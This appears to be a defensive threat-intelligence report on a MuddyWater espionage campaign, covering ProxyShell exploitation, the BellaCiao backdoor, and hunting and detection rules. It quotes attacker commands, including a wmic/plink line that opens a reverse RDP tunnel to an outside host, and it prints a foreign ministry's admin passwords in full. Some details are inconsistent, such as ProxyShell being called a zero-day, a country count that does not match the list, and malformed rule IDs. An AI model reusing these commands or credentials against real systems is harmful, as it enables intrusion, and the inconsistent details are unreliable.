Skip to main content

Executive Summary

This analysis covers a sophisticated cyber espionage campaign conducted by the MuddyWater threat actor (also known as TEMP.Zagros, Mango Sandstorm, TA450) targeting government entities, critical infrastructure, and private sector organizations across the Middle East and globally. Campaign Scope:
  • 140+ confirmed targets across 8+ countries
  • 4 distinct attack phases documented in Episodes 1-4
  • Primary vectors: ProxyShell exploitation (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
  • Persistence mechanism: BellaCiao custom backdoor
  • Attribution confidence: High (based on TTPs, tooling, and target selection)

Key Findings

1. Target Profile and Victim Selection

Primary Targets:
  • Government foreign ministries and diplomatic missions
  • Law enforcement and intelligence agencies
  • Critical infrastructure operators
  • Telecommunications providers
  • Healthcare facilities
  • Financial institutions
Geographic Focus:
  • Middle East (Primary): UAE, Saudi Arabia, Kuwait, Turkey, Jordan, Iran
  • Central Asia: Afghanistan, Pakistan
  • Caucasus: Georgia, Armenia, Azerbaijan
  • Europe (Secondary): Israel, Germany, France, Austria, UK
  • Global (Tertiary): India, South Korea, Australia
Target Selection Criteria:
  • Government entities with foreign policy responsibilities
  • Organizations with access to sensitive intelligence
  • Critical infrastructure with national security implications
  • Regional adversaries and geopolitical competitors

2. Attack Methodology

Phase 1: Reconnaissance

Tools and Techniques:
  • Subdomain enumeration: subfinder, amass, dnsenum
  • Network scanning: nmap, nbtscan
  • Service detection: whatweb, wpscan
  • OSINT collection: whois, DNS enumeration
Reconnaissance Pattern: 
# Subdomain enumeration
subfinder -d [target-domain] -o targets.txt

# Active scanning of discovered hosts
nmap -vvv -Pn --open -p445,22,21,1433,3306,3389,139,80,443,8080 [target-range]

# Service version detection
nmap -sV -sC [target-ip]
Observations:
  • Systematic enumeration of entire government domains
  • Focus on Microsoft Exchange (ports 443, 25, 587)
  • SMB/RDP service discovery (ports 445, 139, 3389)
  • Database service enumeration (ports 1433, 3306)

Phase 2: Initial Access

Primary Attack Vector: ProxyShell Vulnerabilities Chained:
  1. CVE-2021-34473: Pre-auth path confusion vulnerability
  2. CVE-2021-34523: Elevation of privilege on Exchange PowerShell backend
  3. CVE-2021-31207: Post-auth arbitrary file write vulnerability
Exploitation Process: 
# Automated ProxyShell exploitation
python3 proxyshell.py -t [target-domain]
python3 exchange_proxyshell.py -u [target-ip] -e [email@domain]
Success Indicators:
  • Webshell upload to /owa/auth/ or /aspnet_client/
  • HTTP 200 response from webshell path
  • Ability to execute arbitrary commands
Secondary Attack Vectors:
  • SQL injection against web applications
  • SMB relay attacks (attempted via enum4linux, smbclient)
  • RDP brute forcing (using ncrack, crowbar, medusa)
  • FTP service exploitation

Phase 3: Persistence and Lateral Movement

BellaCiao Backdoor Deployment Configuration Profile: 
Service Name: "Java Update Services" / "Microsoft Exchange Services Log"
Executable Path: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
Webserver Script: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
Plink Tunnel: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.exe
Port: 8000 (local web interface)
Alive Time: 24 hours
C2 Domains: twittsupport.com, msn-center.uk
Backup Credentials: Israel / Israel@123!
Persistence Mechanism:
  • Windows service installation with legitimate-sounding name
  • Hidden attribute on executables
  • PowerShell-based webserver for remote management
  • Plink for SSH tunneling (RDP forwarding)
Lateral Movement Techniques: WMI-based Remote Execution: 
wmic /NODE:"[target-ip]" /USER:"[domain\user]" /PASSWORD:"[password]" Process Call Create "cmd.exe /c [command]"
Network Share Access: 
net use \\[target-ip]\C$ "[password]" /user:[domain\user]
dir \\[target-ip]\C$\users
type \\[target-ip]\C$\windows\temp\log.txt
Examples from Turkish Foreign Ministry: 
# Credential harvesting
wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c netstat -ano -p tcp >c:\\windows\\temp\\Crashpad\\log.txt"

# RDP tunneling setup
wmic /NODE:"10.20.105.11" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c echo Y | c:\\programdata\\microsoft\\diagnostic\\vmware-tools.exe 103.57.251.153 -P 443 -C -R 0.0.0.0:40455:127.0.0.1:3389 -l ruby -pw ruby@123!"
SSH Tunneling for Anonymity: 
ssh -N -L 192.168.10.107:8080:127.0.0.2:8080 -p 443 [email protected]

Phase 4: Collection and Exfiltration

Credential Harvesting:
  • SAM database dumping: samdump2 SAM SYSTEM
  • LSASS memory dumping via comsvcs.dll
  • Network share password reuse
  • Active Directory credential extraction
Data Collection:
  • Log file exfiltration from compromised hosts
  • Network topology mapping
  • Email metadata collection (legacyDN enumeration)
  • File server enumeration

3. Infrastructure Analysis

Compromised Infrastructure:
  • ameen-alkhalij.nu - WordPress server (likely victim turned C2)
  • 88.80.145.122 - SSH tunnel/proxy endpoint
  • 103.57.251.31:3512 - SOCKS5 proxy
Command and Control:
  • twittsupport.com - BellaCiao primary C2
  • msn-center.uk - BellaCiao backup C2
Operational Security:
  • Use of Cloudflare for reconnaissance traffic
  • SSH tunneling through compromised infrastructure
  • SOCKS proxies for pivoting
  • Multiple backup C2 domains
  • Legitimate-looking service names for persistence

4. Toolset Analysis

Open Source Tools:
  • Reconnaissance: subfinder, amass, nmap, dnsenum, nbtscan
  • Web Scanning: ffuf, wpscan, whatweb
  • Exploitation: metasploit, sqlmap, various ProxyShell exploits
  • Post-Exploitation: enum4linux, smbclient, wmic, rpcclient
  • Credential Attacks: medusa, ncrack, crowbar
  • Tunneling: SSH, plink
Custom Tools:
  • BellaCiao: Custom backdoor with service persistence
  • ProxyShell Exploits: Multiple Python-based exploit scripts
  • Webshells: Custom ASPX webshells with randomized names
Development Environment:
  • Operating System: Linux (Kali/Parrot OS)
  • Primary Shell: zsh
  • Languages: Python, PowerShell, Go (for BellaCiao)
  • Version Control: Git for tool management

Attack Timeline

Early 2022: Initial Campaign

Q1-Q2 2022: ProxyShell Mass Exploitation
  • Mass scanning of Middle Eastern IP ranges
  • Automated ProxyShell exploitation against Exchange servers
  • Initial webshell deployment across 100+ organizations
  • Focus on government email servers
Documented Targets:
  • Turkey: 41 organizations compromised
  • Saudi Arabia: 29 organizations compromised
  • Kuwait: 21 organizations compromised
  • Iran: 18 organizations compromised

Late 2022: Persistence Establishment

Q3-Q4 2022: BellaCiao Deployment
  • October 26, 2022: Ransomware testing (Episode 4 logs)
  • Service-based persistence mechanisms deployed
  • C2 infrastructure established (twittsupport.com, msn-center.uk)
  • SSH tunneling infrastructure created
Key Compromises:
  • Turkish Foreign Ministry (212.175.168.58)
  • Dubai Police infrastructure (BellaCiao configuration found)
  • Multiple Exchange servers maintained for lateral movement

2023-2024: Sustained Operations

Continuous Activity:
  • Ongoing reconnaissance of government domains
  • Credential harvesting and reuse
  • Lateral movement within compromised networks
  • Establishment of multiple access vectors per organization
Expansion:
  • Additional countries targeted (Pakistan, Georgia, Armenia)
  • Critical infrastructure focus (telecommunications, utilities)
  • Healthcare sector targeting

January 2025: Current Operations

Recent Activity (Jan 8-9, 2025):
  • WordPress exploitation attempts on ameen-alkhalij.nu
  • 100+ XML-RPC brute force attempts in 4-minute window
  • Continuous setup-config.php scanning from Cloudflare IPs
  • Evidence of active C2 infrastructure

Impact Assessment

Confirmed Compromises

Critical Impact (Government):
  • Turkish Foreign Ministry: Full network compromise, credential harvesting, lateral movement documented
  • Dubai Police: BellaCiao backdoor configured specifically for this target
  • Afghan Government: Multiple ministries (MOF, MOD, MOI, MFA, AOP) under active reconnaissance
  • UAE Government: Emaratech, RTA, Dubai Chamber, DNRD under attack
High Impact (Critical Infrastructure):
  • Telecommunications: Turkish Telecom, Jazz Pakistan, Roshan Afghanistan
  • Healthcare: Multiple Saudi hospitals, Kuwaiti medical facilities
  • Financial: Insurance and investment firms in Saudi Arabia, Kuwait
Medium Impact (Private Sector):
  • Manufacturing and industrial companies
  • IT service providers
  • Media organizations

Data at Risk

Sensitive Information:
  • Diplomatic communications (Foreign Ministry compromise)
  • Intelligence and law enforcement data (Police infrastructure)
  • PII of government employees and citizens
  • Financial records and transactions
  • Healthcare patient data
  • Critical infrastructure operational data
Estimated Scale:
  • 140+ organizations with confirmed exploitation attempts
  • 30+ confirmed shells deployed successfully
  • 1,369+ reconnaissance commands executed
  • 49 failed attempts documented (indicates detection)

Geopolitical Context

Attribution Assessment: Based on target selection, TTPs, and operational patterns, this activity is attributed with high confidence to MuddyWater (aka TEMP.Zagros, Mango Sandstorm, TA450), an Iranian state-sponsored APT group. Supporting Evidence:
  • Focus on Middle Eastern governments and adversaries
  • BellaCiao backdoor (known MuddyWater tool)
  • ProxyShell exploitation timeline matches known campaigns
  • Target selection aligns with Iranian strategic interests
  • Use of Persian language in some file paths and commands
Likely Objectives:
  • Intelligence collection on regional adversaries
  • Monitoring of diplomatic activities
  • Pre-positioning for future operations
  • Intellectual property theft
  • Critical infrastructure mapping

Recommendations for Defenders

Immediate Actions (0-24 hours)

1. Hunt for BellaCiao Indicators

Service Detection: 
# Check for suspicious services
Get-Service | Where-Object {$_.Name -like "*Java Update*" -or $_.Name -like "*Microsoft Exchange Services*"}

# Check service executable paths
Get-WmiObject win32_service | Where-Object {$_.PathName -like "*ProgramData\Microsoft\Diagnostic*"}
File System: 
# Check for BellaCiao components
Get-ChildItem "C:\ProgramData\Microsoft\Diagnostic" -Force
Get-ChildItem "C:\ProgramData\Microsoft\Diagnostic\*.exe" -Force
Get-ChildItem "C:\ProgramData\Microsoft\Diagnostic\*.ps1" -Force
Network Connections: 
# Check for connections to C2 domains
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Where-Object {$_.RemotePort -eq 443 -or $_.RemotePort -eq 8000}

2. Webshell Detection

Exchange Server Paths: 
# Scan OWA directories for webshells
Get-ChildItem -Path "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" -Filter "*.aspx" -Recurse

# Scan aspnet_client directories
Get-ChildItem -Path "C:\inetpub\wwwroot\aspnet_client" -Filter "*.aspx" -Recurse
Common Webshell Names:
  • webclient.aspx, OutlookOU.aspx, errorFE.aspx
  • Random 5-10 character names ending in .aspx
  • Files modified after ProxyShell patches were released

3. Network Isolation

Block C2 Domains: 
twittsupport.com
msn-center.uk
ameen-alkhalij.nu
Block Suspicious IPs: 
88.80.145.122 (SSH tunnel endpoint)
103.57.251.31 (SOCKS proxy)

Short-Term Actions (1-7 days)

4. ProxyShell Vulnerability Assessment

Check Exchange Version: 
Get-Command Exsetup.exe | ForEach {$_.FileVersionInfo}
Verify Patching Status:
  • CVE-2021-34473 (May 2021 or later)
  • CVE-2021-34523 (May 2021 or later)
  • CVE-2021-31207 (May 2021 or later)
Apply Patches Immediately:
  • Exchange Server 2019 CU10 or later
  • Exchange Server 2016 CU21 or later
  • Exchange Server 2013 CU23 or later

5. Credential Reset

High-Priority Accounts:
  • Administrator and domain admin accounts
  • Exchange admin accounts
  • Service accounts with network access
  • VPN and remote access accounts
Turkish Foreign Ministry Compromised Credentials: 
Admin1@MFA / KazimAtes1977+-*/!!KazimAtes1977+-*/!!
pfsenselondra@MFA / 1234qqqQQQ
If similar credential patterns exist, reset immediately

6. Log Analysis

Review Exchange Logs: 
# Check IIS logs for ProxyShell indicators
Select-String -Path "C:\inetpub\logs\LogFiles\W3SVC1\*.log" -Pattern "autodiscover/autodiscover.json"
Select-String -Path "C:\inetpub\logs\LogFiles\W3SVC1\*.log" -Pattern "X-Rps-CAT"
Select-String -Path "C:\inetpub\logs\LogFiles\W3SVC1\*.log" -Pattern "X-BEResource"
Review Windows Event Logs: 
# Check for suspicious service installations
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} | Where-Object {$_.Message -like "*Java Update*" -or $_.Message -like "*Diagnostic*"}

# Check for WMI execution
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WMI-Activity/Operational'; ID=5857,5860,5861}
Network Traffic Analysis:
  • Review firewall logs for connections to C2 domains
  • Analyze DNS logs for subdomain enumeration patterns
  • Check proxy logs for reconnaissance activity

7. Endpoint Detection

Deploy EDR/AV Signatures: YARA Rule for BellaCiao: 
rule BellaCiao_Backdoor {
    meta:
        description = "Detects BellaCiao backdoor components"
        threat_level = 10
        in_the_wild = true
    strings:
        $s1 = "Java Update Services" wide ascii
        $s2 = "Microsoft Exchange Services Log" wide ascii
        $s3 = "twittsupport.com" wide ascii
        $s4 = "msn-center.uk" wide ascii
        $path1 = "C:\\ProgramData\\Microsoft\\Diagnostic\\" wide ascii
        $cmd1 = "Israel@123!" wide ascii
    condition:
        any of ($s*) or all of ($path*) or $cmd1
}

Medium-Term Actions (1-4 weeks)

8. Architecture Review

Network Segmentation:
  • Isolate Exchange servers from internal network
  • Implement jump hosts for administrative access
  • Segment critical systems by function and sensitivity
Access Controls:
  • Implement MFA for all administrative accounts
  • Restrict WMI and PowerShell remoting
  • Disable SMBv1 and legacy protocols
  • Apply least privilege principles
Monitoring:
  • Deploy network traffic analysis tools
  • Implement file integrity monitoring on Exchange servers
  • Enable PowerShell script block logging
  • Configure Sysmon for advanced logging

9. Threat Hunting

Hunt for Lateral Movement: 
// Azure Sentinel / Microsoft 365 Defender KQL
DeviceProcessEvents
| where ProcessCommandLine contains "wmic" and ProcessCommandLine contains "/NODE:"
| where ProcessCommandLine contains "/USER:" and ProcessCommandLine contains "/PASSWORD:"

DeviceNetworkEvents  
| where RemoteIP in ("88.80.145.122", "103.57.251.31")
| where RemotePort in (443, 8000, 9090, 40455)

DeviceFileEvents
| where FolderPath startswith "C:\\ProgramData\\Microsoft\\Diagnostic"
| where FileName endswith ".exe" or FileName endswith ".ps1"
Hunt for Reconnaissance: 
DnsEvents
| where Name contains "twittsupport.com" or Name contains "msn-center.uk"

DeviceNetworkEvents
| where RemotePort in (445, 139, 3389, 1433, 3306)
| summarize ConnectionCount=count() by RemoteIP, RemotePort
| where ConnectionCount > 100

10. Incident Response Plan

If Compromise Confirmed:
  1. Containment:
    • Isolate affected systems from network
    • Block C2 domains at firewall/DNS
    • Disable compromised accounts
    • Change all administrative passwords
  2. Eradication:
    • Remove webshells from Exchange servers
    • Delete BellaCiao service and files
    • Rebuild compromised systems from known-good images
    • Apply all security patches
  3. Recovery:
    • Restore from clean backups if available
    • Verify system integrity before reconnecting to network
    • Monitor closely for signs of re-compromise
  4. Lessons Learned:
    • Document timeline of compromise
    • Identify gaps in detection and prevention
    • Update incident response procedures
    • Conduct tabletop exercises

Long-Term Actions (1-3 months)

11. Security Program Enhancements

Vulnerability Management:
  • Establish patch management SLAs (critical patches within 7 days)
  • Implement vulnerability scanning on regular schedule
  • Prioritize internet-facing systems for patching
  • Subscribe to vendor security advisories
Security Monitoring:
  • Deploy SIEM with correlation rules for APT activity
  • Implement network traffic analysis (NTA)
  • Enable cloud-based threat intelligence feeds
  • Establish SOC with 24/7 monitoring capability
Access Management:
  • Implement privileged access management (PAM) solution
  • Deploy jump hosts for all administrative access
  • Enforce MFA for all remote access
  • Review and reduce administrative privileges
Backup and Recovery:
  • Implement offline/air-gapped backups
  • Test backup restoration regularly
  • Ensure backups cover all critical systems
  • Document and practice recovery procedures

12. Threat Intelligence Integration

Subscribe to Feeds:
  • Government CERT advisories (local country)
  • Commercial threat intelligence platforms
  • Information sharing communities (ISACs)
  • Open source intelligence (OSINT) sources
IOC Integration:
  • Automate IOC ingestion into SIEM/EDR
  • Correlate IOCs with internal telemetry
  • Share IOCs with trusted partners
  • Participate in threat intelligence sharing

13. Security Awareness Training

Topics to Cover:
  • Phishing and social engineering awareness
  • Secure password practices
  • Recognizing suspicious activity
  • Incident reporting procedures
  • Insider threat indicators
Target Audiences:
  • Executive leadership (strategic briefing)
  • IT administrators (technical deep dive)
  • All employees (general awareness)
  • Security team (threat hunting techniques)

Detection Rules

Sigma Rules

BellaCiao Service Detection

title: BellaCiao Backdoor Service
id: a8b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects BellaCiao backdoor service installation
references:
    - Internal MuddyWater intelligence
author: Security Team
date: 2025/01/09
logsource:
    product: windows
    service: system
detection:
    selection:
        EventID: 7045
        ServiceName|contains:
            - 'Java Update Services'
            - 'Microsoft Exchange Services Log'
    selection_path:
        EventID: 7045
        ImagePath|contains: 'ProgramData\Microsoft\Diagnostic'
    condition: selection or selection_path
falsepositives:
    - Legitimate Java update services (check path)
level: critical
tags:
    - attack.persistence
    - attack.t1543.003

WMI Lateral Movement

title: WMI Lateral Movement with Credentials
id: b9c4d5e6-f7g8-9012-hijk-lm3456789012
status: experimental
description: Detects WMI lateral movement with embedded credentials
references:
    - Turkish Foreign Ministry compromise
author: Security Team
date: 2025/01/09
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\wmic.exe'
        CommandLine|contains|all:
            - '/NODE:'
            - '/USER:'
            - '/PASSWORD:'
            - 'Process Call Create'
    condition: selection
falsepositives:
    - Legitimate system administration (rare with embedded passwords)
level: high
tags:
    - attack.lateral_movement
    - attack.t1047

ProxyShell Webshell Access

title: ProxyShell Webshell Access
id: c1d2e3f4-g5h6-7890-ijkl-mn4567890123
status: experimental
description: Detects access to webshells in Exchange directories
references:
    - CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
author: Security Team
date: 2025/01/09
logsource:
    category: webserver
detection:
    selection:
        cs-uri-stem|contains:
            - '/owa/auth/'
            - '/aspnet_client/'
        cs-uri-stem|endswith: '.aspx'
        sc-status: 200
    filter:
        cs-uri-stem|contains:
            - '/owa/auth/logon.aspx'
            - '/owa/auth/logout.aspx'
    condition: selection and not filter
falsepositives:
    - Legitimate OWA files (filter common ones)
level: critical
tags:
    - attack.persistence
    - attack.t1505.003

YARA Rules

ProxyShell Webshell

rule ProxyShell_Webshell {
    meta:
        description = "Detects ASPX webshells from ProxyShell exploitation"
        threat_level = 10
        in_the_wild = true
        reference = "MuddyWater ProxyShell campaign"
    strings:
        $aspx1 = "<%@ Page Language=" ascii wide
        $aspx2 = "Request[" ascii wide
        $cmd1 = "cmd.exe" ascii wide
        $cmd2 = "powershell" ascii wide nocase
        $cmd3 = "wmic" ascii wide
        $exec1 = "Process.Start" ascii wide
        $exec2 = "ProcessStartInfo" ascii wide
        $exec3 = "System.Diagnostics" ascii wide
    condition:
        filesize < 100KB and
        any of ($aspx*) and
        any of ($cmd*) and
        any of ($exec*)
}

Conclusion

The MuddyWater campaign represents a significant and ongoing threat to government entities and critical infrastructure across the Middle East. The threat actor demonstrates:
  • Sophistication: Use of zero-day exploits (ProxyShell), custom malware (BellaCiao), and advanced operational security
  • Persistence: Sustained operations over 3+ years with evolving tactics
  • Scale: 140+ targeted organizations across 8+ countries
  • Impact: Confirmed compromise of foreign ministry, law enforcement, and critical infrastructure
Defenders must prioritize:
  1. Immediate patching of ProxyShell vulnerabilities
  2. Hunt for BellaCiao backdoor indicators
  3. Enhanced monitoring of Exchange servers and lateral movement
  4. Credential hygiene and privilege reduction
  5. Network segmentation and access controls
This is an active threat requiring sustained defensive efforts. Organizations in the Middle East, particularly government entities, should assume they are targets and implement defense-in-depth strategies immediately.

Build docs developers (and LLMs) love

Get started for freeTalk to us